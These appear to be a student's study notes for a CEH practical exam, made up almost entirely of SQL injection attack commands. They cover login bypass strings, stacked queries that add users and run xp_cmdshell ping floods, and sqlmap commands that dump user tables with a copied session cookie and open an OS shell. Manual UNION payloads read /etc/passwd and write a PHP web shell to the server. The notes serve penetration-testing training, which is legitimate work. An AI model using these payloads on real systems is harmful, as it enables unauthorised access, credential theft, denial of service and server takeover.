- Log on without valid credentials
- Test for SQL Injection
- Create your own user account
- Create your own database
- Directory listing
- Enforce Denial-of-Service attacks
- Use Nstalker
- Use SQLMAP
From Windows box – to test for sql injection login vulnerability
A. Goto website LOGIN BOX. Type the query blah' or 1=1 -- in the Username field (as your login name), and leave the password field empty. Press enter to see if it logs you in
B. To create user in vulnerable database. Type blah';insert into login values ('tim','bingo123'); -- in the Username field, and click Log in.
C. To creat a database , type blah';create database mydatabase; -- in the Username field, leave the Password field empty, and click Log in.
In the above query, mydatabase is the name of the database, that you are going to create using the SQL Injection query
D. To Perform a DOS attack - type blah';exec master..xp_cmdshell 'ping www.website.com -l 65000 -t'; -- in the Username field, leave the Password field empty, and click Log in. In the above query, you are performing a ping for the www.website.com website using an SQL Injection query: -l is the sent buffer size, and -t refers to pinging the specified host.
Admin logins - https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
USE N-Stalker to look for vulnerabilities
From Windows box
A. Run Nstalker – Enter URL – Try OWASUP scan – Click Start scan
B. On completion of the scan, the Results Wizard appears. Select Save scan results (under Session Management Options) and Keep scan session for further analysis (under Next Steps), and click Next.
USE SQL Map to find DB info (NB NO SPACES IN LOTS OF COMMANDS)
A. Assume that you are registered user in the http://www.website.com website. And you want to crack the passwords of the other users
Open a web browser and type http://www.website.com and press Enter in the address bar. Moviescope webpage appears, login into the Moviescope as Username: sam and Password: test@123 and click Login.
Once you are logged into the website click View Profile tab, and make a note of the URL in the address bar of the browser.
Right-click any where on the webpage and click Inspect Element (Q) from the context menu as shown in the screenshot.
B. Developer Tools section appears, click Console tab and type document.cookie in the lower left corner of the browser and press Enter. Select the cookie value and right-click and Copy the value
C. Open a terminal window
D. Type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step ”> --dbs and press Enter.
E. Do you want to skip test payloads specific for other DBMSes warning appears, type Y and press Enter. Do you want to include all tests for ‘Micorsoft SQL Server’ extending provided level warning appears type Y and press Enter. Do you want to keep testing the others warning appears, type N and press Enter
F. This will show the databases present in MS SQL Server. It also displays information about the web server operating system, web application technology and the back-end DBMS
G. To determine the tables associated with the website.com database. Now type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step”> -D <databasename> --tables and press Enter.
H. For extracting columns information, you need to issue the following sqlmap query. Type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step”> -D <Database name> -T <Table Name> --columns and press Enter.
I. To get all info from User_Login table. type sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope -T User_Login --dump and press Enter to dump the all User_Login table content. Test retrieved passwords on website
J. To open a COMMAND SHELL. type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step”> --os-shell and press Enter.
K. From here you can type hostname or ipconfig to get details of machine you have compromised.
https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
https://resources.infosecinstitute.com/important-sqlmap-commands/#gref
MYSQL
Connect to local database
mysql -u zabbix -D zabbixdb -p
SQLMAP
Use burpsuite to capture login request
Save login request to login.req
sqlmap r login.req –level 5
Search for databases
sqlmap –u http://192.168.1.1/index.php?par= –dbs
Checking privileges of the users in database
sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges
Reading a file from the web server
sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch
Dump Username and Password
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5
Dump tables
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump
Automated Shell
sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell
sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch
sqlmap -l trace.txt –dbs (RDBMS Enum)
sqlmap -l trace.txt -D <db> –tables (Dump tables)
sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)
Crawl links
sqlmap -u http://192.168.1.1 –crawl=1
sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3
Manual sql injection commands
Check for sqli vulnerability
?id=1′
Find the number of columns
?id=1 order by 9 — –
Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 — –
Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 — –
Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 — –
Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –
Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
Read file
?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –
Create a file and call it to check if really created
?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –
?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –
Create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –
?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –
Then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
https://jensoroger.wordpress.com/2019/02/28/ceh-practical-lpt-master-ctf-notes-in-general/